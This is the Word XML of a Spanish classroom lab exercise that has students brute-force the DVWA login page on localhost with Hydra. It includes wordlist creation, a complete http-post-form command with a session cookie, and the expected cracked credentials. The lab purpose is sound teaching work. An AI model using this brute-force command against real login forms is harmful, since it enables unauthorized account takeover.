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D3A3" w14:textId="4F5E34A1" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Objetivo del ejercicio en Ubuntu o Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3A4" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:r>
        <w:t xml:space="preserve">Simular un ataque de fuerza bruta contra la pantalla de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de DVWA usando la herramienta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:r>
        <w:t>, disponible en los repositorios de Ubuntu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3A5" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="63A3D3D5">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3A6" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_0"/>
          <w:id w:val="147982137"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F84558">
            <w:rPr>
              <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              <w:b/>
            </w:rPr>
            <w:t>✅</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F84558">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Requisitos previos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3A7" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu (Desktop o en VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3A8" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DVWA funcionando en http://localhost/DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3A9" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DVWA en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3AA" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apache y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MariaDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> funcionando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3AB" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Internet (para instalar Hydra si no está)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3AC" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="63A3D3D6">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3AD" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Quattrocento Sans" w:eastAsia="Quattrocento Sans" w:hAnsi="Quattrocento Sans" w:cs="Quattrocento Sans"/>
          <w:b/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> PASO 1: Instalar Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3AE" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:r>
        <w:t>Si aún no está instalada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3AF" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558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63A3D3B0" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558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hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3B1" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="63A3D3D7">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3B2" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Quattrocento Sans" w:eastAsia="Quattrocento Sans" w:hAnsi="Quattrocento Sans" w:cs="Quattrocento Sans"/>
          <w:b/>
        </w:rPr>
        <w:t>📄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> PASO 2: Crear las listas de usuarios y contraseñas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3B3" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:r>
        <w:t>En tu directorio personal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3B4" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cd  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63A3D3B5" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRPr="001A62CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_1"/>
          <w:id w:val="811332117"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F84558" w:rsidRPr="001A62CB">
            <w:rPr>
              <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              <w:b/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>➤</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F84558" w:rsidRPr="001A62CB">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3B6" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRPr="00F84558" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>echo -e "admin\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ntest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" &gt; users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3B7" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRPr="00F84558" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_2"/>
          <w:id w:val="-1612660556"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F84558" w:rsidRPr="00F84558">
            <w:rPr>
              <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              <w:b/>
              <w:lang w:val="en-GB"/>
            </w:rPr>
            <w:t>➤</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F84558" w:rsidRPr="00F84558">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3B8" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRPr="00F84558" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>echo -e "1234\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>npassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ntoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>\n123456" &gt; passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3B9" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="63A3D3D8">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3C3" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="63A3D3D9">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3C4" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Quattrocento Sans" w:eastAsia="Quattrocento Sans" w:hAnsi="Quattrocento Sans" w:cs="Quattrocento Sans"/>
          <w:b/>
        </w:rPr>
        <w:t>💣</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> PASO 4: Ejecutar el ataque con Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3C5" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:r>
        <w:t>Desde el terminal, estando en la carpeta con tus listas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099689A1" w14:textId="77777777" w:rsidR="001A62CB" w:rsidRPr="001A62CB" w:rsidRDefault="001A62CB" w:rsidP="001A62CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hydra -L users.txt -P password.txt 127.0.0.1 http-post-form \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2AA7A6" w14:textId="77777777" w:rsidR="001A62CB" w:rsidRDefault="001A62CB" w:rsidP="001A62CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>'/DVWA/vulnerabilities/brute</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/:username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>=^USER^&amp;password=^PASS^&amp;Login=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Login:Username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> and/or password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>incorrect.:H</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>=Cookie: security=low; PHPSESSID=80ddc932519d88b86198a74769f47c9c' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B57E8" w14:textId="77777777" w:rsidR="001A62CB" w:rsidRDefault="001A62CB" w:rsidP="001A62CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EC8F8F" w14:textId="79FF9AAC" w:rsidR="001A62CB" w:rsidRPr="001A62CB" w:rsidRDefault="001A62CB" w:rsidP="001A62CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La id de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a que tu tengas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3C7" w14:textId="526E740E" w:rsidR="00D166D6" w:rsidRDefault="001A62CB" w:rsidP="001A62CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A62CB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>-V -I -t 4 -f</w:t>
      </w:r>
      <w:r w:rsidR="00F84558">
        <w:rPr>
          <w:rFonts w:ascii="Quattrocento Sans" w:eastAsia="Quattrocento Sans" w:hAnsi="Quattrocento Sans" w:cs="Quattrocento Sans"/>
          <w:b/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidR="00F84558">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3C8" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-L: lista de usuarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3C9" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-P: lista de contraseñas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3CA" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>http-post-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: ataque a formulario web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3CB" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: mensaje que devuelve la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>app</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cuando el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> falla (lo puedes ver en el HTML de DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3CC" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="63A3D3DA">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3CD" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_3"/>
          <w:id w:val="1919112389"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F84558">
            <w:rPr>
              <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
              <w:b/>
            </w:rPr>
            <w:t>✅</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F84558">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3CE" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:r>
        <w:t>Hydra devolverá algo así:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3CF" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRPr="00F84558" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>80][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F84558">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>http-post-form] host: 127.0.0.1   login: admin   password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3D0" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="63A3D3DB">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3D1" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Quattrocento Sans" w:eastAsia="Quattrocento Sans" w:hAnsi="Quattrocento Sans" w:cs="Quattrocento Sans"/>
          <w:b/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Extra: Cambiar nivel de seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3D2" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:r>
        <w:t xml:space="preserve">Haz que tus alumnos cambien la seguridad de DVWA a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y repitan el ataque para ver cómo ya no funciona tan fácilmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3D3" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:r>
        <w:t>Resultado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3D3D4" w14:textId="77777777" w:rsidR="00D166D6" w:rsidRDefault="00F84558">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63A3D3DC" wp14:editId="63A3D3DD">
            <wp:extent cx="5400040" cy="2581910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="610419014" name="image1.png" descr="Interfaz de usuario gráfica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z de usuario gráfica, Aplicación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166D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2A3986B-A269-4658-B87F-4595E4EC5D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D0E9F37-4124-42C2-9E21-EC17C12AA254}"/>
    <w:embedBold r:id="rId3" w:fontKey="{D8BED54B-24E6-4448-890F-EAB0649FEACA}"/>
    <w:embedItalic r:id="rId4" w:fontKey="{D2F9A0BF-9D63-4A08-A32B-73DCD8A27247}"/>
  </w:font>
  <w:font w:name="Play">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:embedRegular r:id="rId5" w:fontKey="{C8D47054-D552-4C8E-A291-4204274871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FD2C67C7-22C9-4367-B893-3E4ED8D5464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7" w:subsetted="1" w:fontKey="{18E0A0D4-E996-428A-B869-34E02A8C4E91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8" w:fontKey="{D53A0985-F11B-4824-BB5A-3030BA2B3633}"/>
    <w:embedBold r:id="rId9" w:fontKey="{BD981D7F-8CC3-4A05-A800-8EDE293044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20A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="906E48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D0C0E9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE96D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58050635">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1404836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D6"/>
    <w:rsid w:val="001A62CB"/>
    <w:rsid w:val="004F7A6C"/>
    <w:rsid w:val="008648C6"/>
    <w:rsid w:val="00B30DBD"/>
    <w:rsid w:val="00D166D6"/>
    <w:rsid w:val="00EF108F"/>
    <w:rsid w:val="00F84558"/>
    <w:rsid w:val="00FA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3D3A3"/>
  <w15:docId w15:val="{C7B985C5-F891-4231-9A96-801A8E9C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77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077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077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773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773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773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3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3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39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7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77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3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3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3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3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394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Lym/gbP1n/FoSoC5wWFkOfLpCQ==">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dzh1QXRHM25CLUQ5bzJ5ajQ0aHlzV1dBT3VpZ0lsV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195</Words>
  <Characters>1408</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>67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Ruiz</dc:creator>
  <cp:lastModifiedBy>Alberto Ruiz</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-17T12:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-04T08:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>